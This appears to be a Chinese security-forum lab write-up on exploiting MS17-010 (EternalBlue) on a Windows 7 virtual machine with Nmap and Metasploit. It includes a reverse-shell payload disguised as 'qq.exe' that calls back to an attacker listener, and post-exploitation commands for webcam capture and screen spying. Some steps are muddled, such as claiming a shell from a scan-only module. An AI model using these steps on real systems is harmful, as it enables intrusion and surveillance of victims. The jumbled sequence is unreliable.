设为首页收藏本站
查看: 3863|回复: 1

利用ms17-010漏洞对win7进行渗透

[复制链接]
  • TA的每日心情
    无聊
    2024-3-27 14:11
  • 签到天数: 112 天

    [LV.6]常住居民II

    发表于 2022-7-19 21:48:52 | 显示全部楼层 |阅读模式
    本次实验思路可能会有些乱,有的操作可能有重复或者不连贯的可能,仅供参考,大佬勿喷,欢迎各位评论留言,批评指正



    【文章标题】:利用ms17-010漏洞对win7进行渗透

    【文章作者】:Alex

    【目标地址】:110.64.216.76

    【渗透用时】:1h

    【所用工具】:Kali–>metasploit平台、Nmap

    【本机环境】:kali

    【目标环境】:Windows 7

    -------------------------------------------



    【渗透过程】

    1.永恒之蓝是什么

    1.1 定义

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。



    1.2 原理


    恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。



    2. 445端口的作用


    SMB(server message blick) 是windows协议族,用于文件和打印共享服务。



    3. Metasploit是什么

    Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。



    4. 渗透实验准备

    靶机:Windows 7 虚拟机 ip(目标地址):10.64.216.76

    攻击机:kali 虚拟机 ip:10.64.216.217

    工具:kali自带的Nmap及metasploit攻击框架



    5. 渗透实验过程

    (1)以root身份登录kali,并初始化数据库启动metasploit

    msfdb init 初始化数据库

    图片1.png (11.44 KB, 下载次数: 2)

    msfconsole 启动metasploit

    图片2.png (49.56 KB, 下载次数: 0)



    (2)扫描目标ip端口

    利用nmap模块进行扫描,检查目标ip哪些端口是打开的

    db_nmap -sT -T4 10.64.216.76 可以看到靶机的445端口是打开的

    图片3.png (98.82 KB, 下载次数: 0)


    扩展:namp重要常用参数含义

    -sP ping 扫描(不进行端口扫描)
    -P0 无ping 扫描
    -p 指定端口扫描
    -sT TCP 全连接扫描
    -sS SYN 半连接扫描
    -sF FIN 扫描
    -sN Null 扫描
    -sX Xmas 扫描
    -O 测探目标主机版本
    -sV 显示服务的详细版本
    -A 全面扫描
    -oN 将扫描结果保存成txt 格式
    -oX 将扫描结果保存成xml 格式
    -T1,-T2,-T3,-T4,-T5 扫描速度


    (3)查看该网络中所有主机和服务


    host 可检查该网络中所有主机

    图片4.png (24.05 KB, 下载次数: 0)

    service 可查看该网络中所有服务

    图片5.png (27.75 KB, 下载次数: 0)



    (4)Metasploit端口扫描

    auxiliary/scanner/portscan/ack ACK防火墙扫描

    图片6.png (98.51 KB, 下载次数: 0)



    拓展:

    auxiliary/scanner/portscan/ftpbounce  FTP 跳端口扫描
    auxiliary/scanner/portscan/syn        SYN端口扫描
    auxiliary/scanner/portscan/tcp        TCP端口扫描
    auxiliary/scanner/portscan/xmas       TCP"XMas"端口扫描


    (5)搜索并调用ms17-010扫描模块

    search ms17_010 搜索ms17_010扫描模块

    图片7.png (7.51 KB, 下载次数: 0)

    use auxiliary/scanner/smb/smb_ms17_010 启动永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞

    图片8.png (95.8 KB, 下载次数: 0)


    (6)查看模块需要配置的参数

    show options 可查看调用模块需要配置的参数

    右边Required为yes的选项说明左边对应的项需要填写

    图片9.png (28.84 KB, 下载次数: 0)


    (7)设置rhost并启动模块

    RHOSTS 即要探测主机的ip或ip范围

    run 启动模块

    10.jpg (281.92 KB, 下载次数: 0)

    (8)现在已拿到靶机的shell

    ipconfig 进行查看目标机的网卡信息

    图片11.png (45.63 KB, 下载次数: 0)

    sysinfo 查看目标机操作系统信息

    图片12.png (16.71 KB, 下载次数: 0)



    (9)调用载荷

    (9.1)新建控制台窗口,并查看 msf的payload列表

    msfvenom --list payload查看所有可用的payload

    图片13.png (264.07 KB, 下载次数: 0)



    拓展:

    病毒通常会做一些有害的或者恶性的动作。在病毒代码中实现这个功能的部分叫做“有效负载”(payload)。payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。

                                           ——— 摘自《决战恶意代码(美)斯考迪斯》P20



    (9.2)在攻击服务器上生成连接软件,lhost为攻击机ip

    msfbenom -p windows/meterpreter/reverse_tcp lhost(攻击机IP) lport=8881 -f exe > qq.exe  我这里不知怎么回事显示失败了,可能是我之前已经生成的缘故

    图片14.png (51.88 KB, 下载次数: 0)



    (9.3)之后检测qq.EXE是否为win7中可用项目

    输入 file qq2.exe

    图片15.png (18.34 KB, 下载次数: 0)



    (10)返回第一次的msf页面,调用侦听模块 exploitmultihandler

    use exploit/multi/handler

    图片16.png (28.32 KB, 下载次数: 0)



    (10.1)show options 查看配置参数

    图片17.png (85.75 KB, 下载次数: 0)



    (11)配置payload

    set payload windows/meterpreter/reverse_tcp

    图片18.png (14.21 KB, 下载次数: 0)



    (12)检查配置

    show options

    图片19.png (118.18 KB, 下载次数: 0)



    (13)设置攻击机ip和监听端口,将软件发给目标机并进行监听

    set lhost 10.64.216.217 设置攻击机ip

    set lport 8881 设置端口8881为监听端口

    run或者exploit 此时kali上会显示连接提示

    图片20.png (73.34 KB, 下载次数: 1)


    (14)测试是否连接成功

    shell 测试是否连接成功,如出现如图情况则说明攻击成功

    21.jpg (190.54 KB, 下载次数: 0)



    对目标机操作命令拓展:


    webcam_list  查看摄像头
    Webcam_snap  拍照
    Webcam_stream 开启视频
    Screenshot 获取截图
    Screenshare 实时监控桌面
    Shutdown 关闭机器
    webcam_stream 开启摄像头
    screenshot 截取屏幕
    run vnc 屏幕监控 (若对方电脑上有安全软件会不稳定或者失败)


    【渗透总结】



    1、auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞

    exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击

    2、use auxiliary/scanner/smb/smb_ms17_010 该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试

    3、若控制靶机之后执行命令返回的信息出现乱码,则执行命令 chcp 65001 切换编码字符,然后执行命令显示正常。



    【作者声明】

    本文章仅供参考,此文所提供的信息只为网络安全人员进行学习参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行**操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
  • TA的每日心情
    慵懒
    2024-4-16 18:29
  • 签到天数: 166 天

    [LV.7]常住居民III

    发表于 2022-7-20 09:12:40 | 显示全部楼层
    这是每天一贴啊
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    红盟社区--红客联盟 

    Processed in 0.063448 second(s), 28 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    备案号:冀ICP备20006029号-1 Powered by HUC © 2001-2021 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表